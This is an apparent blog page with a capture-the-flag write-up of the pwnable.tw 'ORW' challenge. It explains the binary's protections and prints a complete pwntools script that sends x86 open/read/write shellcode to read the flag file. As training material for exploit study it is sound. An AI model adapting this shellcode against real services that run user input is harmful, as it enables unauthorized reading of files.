<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="google-translate-customization" content="108d9124921d80c3-80e20d618ff053c8-g4f02ec6f3dba68b7-c">
<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>ORW - pwnable.tw | TourPran Blogs</title>
<meta name="generator" content="Jekyll v4.3.3">
<meta property="og:title" content="ORW - pwnable.tw">
<meta name="author" content="tourpran">
<meta property="og:locale" content="en_US">
<meta name="description" content="Hey guys, this is a pretty awesome challenge !! Here we will be writing assembly and then we will give it to the program(binary)">
<meta property="og:description" content="Hey guys, this is a pretty awesome challenge !! Here we will be writing assembly and then we will give it to the program(binary)">
<link rel="canonical" href="http://localhost:4000/writeup/2020/04/30/pwnabletw2.html">
<meta property="og:url" content="http://localhost:4000/writeup/2020/04/30/pwnabletw2.html">
<meta property="og:site_name" content="TourPran Blogs">
<meta property="og:type" content="article">
<meta property="article:published_time" content="2020-04-30T00:00:00+05:30">
<meta name="twitter:card" content="summary">
<meta property="twitter:title" content="ORW - pwnable.tw">
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"tourpran"},"dateModified":"2020-04-30T00:00:00+05:30","datePublished":"2020-04-30T00:00:00+05:30","description":"Hey guys, this is a pretty awesome challenge !! Here we will be writing assembly and then we will give it to the program(binary)","headline":"ORW - pwnable.tw","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/writeup/2020/04/30/pwnabletw2.html"},"url":"http://localhost:4000/writeup/2020/04/30/pwnabletw2.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="shortcut icon" href="">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-noto-sans@0.0.72/index.min.css">
  <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/10.1.1/styles/default.min.css">
  <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/10.1.1/highlight.min.js"></script>
  <!-- and it's easy to individually load additional languages -->
  <script charset="UTF-8" src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/10.1.1/languages/go.min.js"></script>
  <link rel="stylesheet" href="/assets/css/main.css">
  <script src="/assets/js/main.js"></script><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="TourPran Blogs">
</head>
<body>



















<header class="site-header " role="banner">

  <div class="wrapper">
    <div class="site-header-inner">
<span class="site-brand"><a class="site-brand-inner" rel="author" href="/">
  <img class="site-favicon" title="TourPran Blogs" src="" onerror="this.style.display='none'">
  TourPran Blogs
</a>
</span><nav class="site-nav">
          <input type="checkbox" id="nav-trigger" class="nav-trigger">
          <label for="nav-trigger">
            <span class="menu-icon">
              <svg viewbox="0 0 18 15" width="18px" height="15px">
                <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"></path>
              </svg>
            </span>
          </label>

          <div class="trigger">
<a class="page-link" href="/">HOME</a><a class="page-link" href="/pwntrain.html">PWN TRAINING</a><a class="page-link" href="/categories.html">CATEGORIES</a><a class="page-link" href="/portfolio.html">PORTFOLIO</a>




</div>
        </nav>
</div>
  </div>
</header>

<script>
  (function() {
    var lastScrollY = getScrollPos().y;
    var documentElement = document.documentElement;

    function storeScrollData() {
      var y = getScrollPos().y;var scrollStatus = "";

      if (y <= 0) {
        scrollStatus = "top";
      } else if ((window.innerHeight + y) >= document.body.offsetHeight) {
        scrollStatus = "bottom";
      } else {
        var isScrollDown = (y - lastScrollY > 0) ? true : false;
        scrollStatus = isScrollDown ? "down" : "up";
      }

      lastScrollY = y;
      documentElement.setAttribute("data-scroll-status", scrollStatus);
    }

    window.addEventListener('scroll', function(e) {
      storeScrollData();
    });

    storeScrollData();
  })();
</script>










































<script>
  function hashLocate(hashValue) {
    hashValue = hashValue.replace(/^.*#h-/, '');
    var element = document.getElementById(hashValue);

    if (!element) {
      return;
    }

    var header = document.querySelector('header.site-header');
    var headerRect = header.getBoundingClientRect();
    var headerTop = Math.floor(headerRect.top);
    var headerHeight = Math.floor(headerRect.height);
    var scrollPos = getScrollPos();
    var offsetY = element.offsetTop - (headerTop + headerHeight + 20);

    if (offsetY == scrollPos.y) {
      return;
    }

    if (headerTop == 0  && offsetY > scrollPos.y) {
      offsetY += headerHeight + 2;
    } else if (headerTop < 0  && offsetY < scrollPos.y) {
      offsetY -= headerHeight - 2;
    }

    smoothScrollTo(offsetY);
  }

  // The first event occurred
  window.addEventListener('load', function(event) {
    if (window.location.hash) {
      hashLocate(window.location.hash);
    }
  });

  // The first event occurred
  window.addEventListener('click', function(event) {
    if (event.target.matches('a')) {
      hashLocate(event.target.getAttribute('href'));
    }
  });
</script>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <div class="framework">
  <section class="main">

     <div class="post">
  <section>









<header class="post-header">
  <h1 class="post-title p-name" itemprop="name headline">ORW - pwnable.tw</h1>
  <h3 class="post-subtitle"></h3>

  <p class="post-meta">
    <time class="dt-published" datetime="2020-04-30T00:00:00+05:30" itemprop="datePublished"><i class="fa fa-calendar"></i> 30 Apr 2020
    </time>

    





















    <span class="post-reading-time left-vsplit"><i class="fa fa-clock-o"></i> About 4 mins</span>
  </p>
<div class="post-tags"><a class="post-tag" href="/tags.html#pwnable.tw">#pwnable.tw</a></div></header>
<article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

    <div class="post-content e-content" itemprop="articleBody">

      <blockquote>
  <p>Hey guys, this is a pretty awesome challenge !! Here we will be writing assembly and then we will give it to the program(binary)</p>
</blockquote>

<p><img src="/assets/images/pwnabletw2/pwnable1.png" alt=""></p>

<h3 id="solution">Solution:</h3>

<p>First I check the mitigations :</p>

<p><img src="/assets/images/pwnabletw2/pwnable2.png" alt=""></p>

<ul>
  <li>We have NX disabled. That means it is something to do with the shellcode.</li>
  <li>Seems like there is a canary which will not allow you to do a stack based buffer overflows.</li>
  <li>there is no pie so the address of the binary will be same every time you run.</li>
</ul>

<p>Let’s see the disassembly of this program
<img src="/assets/images/pwnabletw2/pwnable.gif" alt=""></p>

<p>Here we can see that our input is being put in the address <code class="language-plaintext highlighter-rouge">0x804a060</code> and then it is moved to EAX and then after that EAX is called.
Meaning: our input is being executed. Now, let us run the binary and see what is happening :&gt;</p>

<p><img src="/assets/images/pwnabletw2/pwnable3.png" alt=""></p>

<blockquote>
  <p>Hmm… We get a segfault.</p>
</blockquote>

<h4 id="idea">Idea:</h4>

<ul>
  <li>As said in the question we will you three syscalls and then get the flag</li>
  <li>First call: open the flag file</li>
  <li>Second call: read the file</li>
  <li>Third call: write it to the output</li>
</ul>

<h4 id="exploit">Exploit:</h4>

<p>We will see the exploit in parts.</p>

<h4 id="part-1">Part 1</h4>

<p><img src="/assets/images/pwnabletw2/pwnable4.png" alt=""></p>

<ul>
  <li>We make EAX to 5</li>
  <li>we push the string “///home/orw/flag”</li>
  <li>We make EBX pointing to the stack ( the string )</li>
  <li>We make EDX equal to 0 and then we make the syscall.</li>
</ul>

<h4 id="part-2">Part 2</h4>

<p><img src="/assets/images/pwnabletw2/pwnable5.png" alt=""></p>

<ul>
  <li>We make EAX equal to 3</li>
  <li>We make ECX point to the string</li>
  <li>Give EDX the buffer size</li>
  <li>Call the syscall</li>
</ul>

<h4 id="part-3">Part 3</h4>

<p><img src="/assets/images/pwnabletw2/pwnable6.png" alt=""></p>

<ul>
  <li>We make EAX equal to 4</li>
  <li>Make EBX equal to 0</li>
  <li>Add 1 to EBX / making EBX equal to 1. Then call the syscall.</li>
</ul>

<blockquote>
  <p>Refer to the below image if having any doubts !!</p>
</blockquote>

<p><img src="/assets/images/pwnabletw2/pwnable7.png" alt=""></p>

<p>If we put all of the things together, then we get the flag.</p>

<p><img src="/assets/images/pwnabletw2/pwnable8.png" alt=""></p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="kn">from</span> <span class="n">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">p</span> <span class="o">=</span> <span class="nf">remote</span><span class="p">(</span><span class="sh">'</span><span class="s">chall.pwnable.tw</span><span class="sh">'</span><span class="p">,</span><span class="mi">10001</span><span class="p">)</span>
<span class="k">print</span> <span class="n">p</span><span class="p">.</span><span class="nf">recv</span><span class="p">()</span>
<span class="n">s</span> <span class="o">=</span> <span class="nf">asm</span><span class="p">(</span><span class="sh">"</span><span class="s">xor eax, eax</span><span class="sh">"</span><span class="p">)</span>
<span class="n">s</span> <span class="o">+=</span> <span class="nf">asm</span><span class="p">(</span><span class="sh">"</span><span class="s">push eax</span><span class="sh">"</span><span class="p">)</span>
<span class="n">s</span> <span class="o">+=</span> <span class="nf">asm</span><span class="p">(</span><span class="sh">"</span><span class="s">add eax, 5</span><span class="sh">"</span><span class="p">)</span>
<span class="n">s</span> <span class="o">+=</span> <span class="nf">asm</span><span class="p">(</span><span class="sh">"</span><span class="s">push 0x67616c66</span><span class="sh">"</span><span class="p">)</span>
<span class="n">s</span> <span class="o">+=</span> <span class="nf">asm</span><span class="p">(</span><span class="sh">"</span><span class="s">push 0x2f77726f</span><span class="sh">"</span><span class="p">)</span>
<span class="n">s</span> <span class="o">+=</span> <span class="nf">asm</span><span class="p">(</span><span class="sh">"</span><span class="s">push 0x2f656d6f</span><span class="sh">"</span><span class="p">)</span>
<span class="n">s</span> <span class="o">+=</span> <span class="nf">asm</span><span class="p">(</span><span class="sh">"</span><span class="s">push 0x682f2f2f</span><span class="sh">"</span><span class="p">)</span>
<span class="n">s</span> <span class="o">+=</span> <span class="nf">asm</span><span class="p">(</span><span class="sh">"</span><span class="s">mov ebx, esp</span><span class="sh">"</span><span class="p">)</span>
<span class="n">s</span> <span class="o">+=</span> <span class="nf">asm</span><span class="p">(</span><span class="sh">"</span><span class="s">mov edx, 0</span><span class="sh">"</span><span class="p">)</span>
<span class="n">s</span> <span class="o">+=</span> <span class="nf">asm</span><span class="p">(</span><span class="sh">"</span><span class="s">int 0x80</span><span class="sh">"</span><span class="p">)</span>
<span class="n">s</span> <span class="o">+=</span> <span class="nf">asm</span><span class="p">(</span><span class="sh">"</span><span class="s">mov eax, 3</span><span class="sh">"</span><span class="p">)</span>
<span class="n">s</span> <span class="o">+=</span> <span class="nf">asm</span><span class="p">(</span><span class="sh">"</span><span class="s">mov ecx, ebx</span><span class="sh">"</span><span class="p">)</span>
<span class="n">s</span> <span class="o">+=</span> <span class="nf">asm</span><span class="p">(</span><span class="sh">"</span><span class="s">mov ebx, 3</span><span class="sh">"</span><span class="p">)</span>
<span class="n">s</span> <span class="o">+=</span> <span class="nf">asm</span><span class="p">(</span><span class="sh">"</span><span class="s">mov edx, 40</span><span class="sh">"</span><span class="p">)</span>
<span class="n">s</span> <span class="o">+=</span> <span class="nf">asm</span><span class="p">(</span><span class="sh">"</span><span class="s">int 0x80</span><span class="sh">"</span><span class="p">)</span>
<span class="n">s</span> <span class="o">+=</span> <span class="nf">asm</span><span class="p">(</span><span class="sh">"</span><span class="s">mov eax, 4</span><span class="sh">"</span><span class="p">)</span>
<span class="n">s</span> <span class="o">+=</span> <span class="nf">asm</span><span class="p">(</span><span class="sh">"</span><span class="s">mov ebx, 0</span><span class="sh">"</span><span class="p">)</span>
<span class="n">s</span> <span class="o">+=</span> <span class="nf">asm</span><span class="p">(</span><span class="sh">"</span><span class="s">inc ebx</span><span class="sh">"</span><span class="p">)</span>
<span class="n">s</span> <span class="o">+=</span> <span class="nf">asm</span><span class="p">(</span><span class="sh">"</span><span class="s">int 0x80</span><span class="sh">"</span><span class="p">)</span>
<span class="n">p</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="n">s</span><span class="p">)</span>
<span class="n">f</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="nf">recv</span><span class="p">()</span>
<span class="k">print</span> <span class="n">f</span>
<span class="n">p</span><span class="p">.</span><span class="nf">interactive</span><span class="p">()</span>

</code></pre></div></div>

<blockquote>
  <p>I hope you liked the write-up. More writeups on its way.</p>
</blockquote>


    </div>

</article>
<div class="post-nav">
<a class="previous" href="/writeup/2020/04/29/pwnabletw1.html" title="Start - pwnable.tw">Start - pwnable.tw</a><a class="next" href="/blogs/2020/09/10/blog1.html" title="[part 1] Executable and Linkable Format - Sections and Segments">[part 1] Executable and Linkable Format...</a>
</div>
<div class="post-related">
      <div>Related Articles</div>
      <ul>
        <li><a class="post-link" href="/pwn-training/2021/05/09/simple-ret2shellcode-training1.html" title="[part 1] Executable and Linkable Format - Sections and Segments">[pwn 1] Return to Shellcode</a></li>
<li><a class="post-link" href="/writeup/2020/04/30/pwnabletw2.html" title="[part 1] Executable and Linkable Format - Sections and Segments">ORW - pwnable.tw</a></li>
<li><a class="post-link" href="/writeup/2020/04/29/pwnabletw1.html" title="[part 1] Executable and Linkable Format - Sections and Segments">Start - pwnable.tw</a></li>
<li><a class="post-link" href="/blogs/2020/09/10/blog1.html" title="[part 1] Executable and Linkable Format - Sections and Segments">[part 1] Executable and Linkable Format - Sections and Segments</a></li>
</ul>
    </div>
<div class="post-comments"></div></section>
</div>


  </section>
  <section class="sidebar" style="margin-left: 15px;">
    <!-- Get sidebar items --><style type="text/css" media="screen">
.post-menu ul {
  list-style: none;
  padding: 0;
  margin: 0;
}
</style>

<div class="post-menu">
  <div class="post-menu-title">TOC</div>
  <div class="post-menu-content"></div>
</div>

<script>
  function generateContent() {
    var menu = document.querySelector(".post-menu");
    var menuContent =  menu.querySelector(".post-menu-content");
    var headings = document.querySelector(".post-content").querySelectorAll("h2, h3, h4, h5, h6");

    // Hide menu when no headings
    if (headings.length === 0) {
      return menu.style.display = "none";
    }

    // Generate post menu
    var menuHTML = '';
    for (var i = 0; i < headings.length; i++) {
      var h = headings[i];
      menuHTML += (
        '<li class="h-' + h.tagName.toLowerCase() + '">'
        + '<a href="#h-' + h.getAttribute('id') + '">' + h.textContent + '</a></li>');
    }

    menuContent.innerHTML = '<ul>' + menuHTML + '</ul>';

    // The header element
    var header = document.querySelector('header.site-header');

    function doMenuCollapse(index, over_items=20) {
      var items = menuContent.firstChild.children;

      if (items.length < over_items) {
        return;
      }

      var activeItem = items[index];
      var beginItem = activeItem
      var endItem = activeItem
      var beginIndex = index;
      var endIndex = index + 1;
      while (beginIndex >= 0
        && !items[beginIndex].classList.contains('h-h2')) {
        beginIndex -= 1;
      }
      while (endIndex < items.length
        && !items[endIndex].classList.contains('h-h2')) {
        endIndex += 1;
      }
      for (var i = 0; i < beginIndex; i++) {
        item = items[i]
        if (!item.classList.contains('h-h2')) {
          item.style.display = 'none';
        }
      }
      for (var i = beginIndex + 1; i < endIndex; i++) {
        item = items[i]
        // if (!item.classList.contains('h-h2')) {
          item.style.display = '';
        // }
      }
      for (var i = endIndex; i < items.length; i++) {
        item = items[i]
        if (!item.classList.contains('h-h2')) {
          item.style.display = 'none';
        }
      }
    }

    // Init menu collapsed
    doMenuCollapse(-1);

    // Active the menu item
    window.addEventListener('scroll', function (event) {
      var lastActive = menuContent.querySelector('.active');
      var changed = true;
      var activeIndex = -1;
      for (var i = headings.length - 1; i >= 0; i--) {
        var h = headings[i];
        var headingRect = h.getBoundingClientRect();
        var headerRect = header.getBoundingClientRect();
        var headerTop = Math.floor(headerRect.top);
        var headerHeight = Math.floor(headerRect.height);
        var headerHeight = headerTop + headerHeight + 20;
        if (headingRect.top <= headerHeight) {
          var id = 'h-' + h.getAttribute('id');
          var a = menuContent.querySelector('a[href="#' + id  + '"]');
          var curActive = a.parentNode;
          if (curActive) {
            curActive.classList.add('active');
            activeIndex = i;
          }
          if (lastActive == curActive) {
            changed = false;
          }
          break;
        }
      }
      if (changed) {
        if (lastActive) {
          lastActive.classList.remove('active');
        }
        doMenuCollapse(activeIndex);
      }
      event.preventDefault();
    });
  }
  generateContent();
</script>
</section>
</div>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

</footer>
</body>
</html>
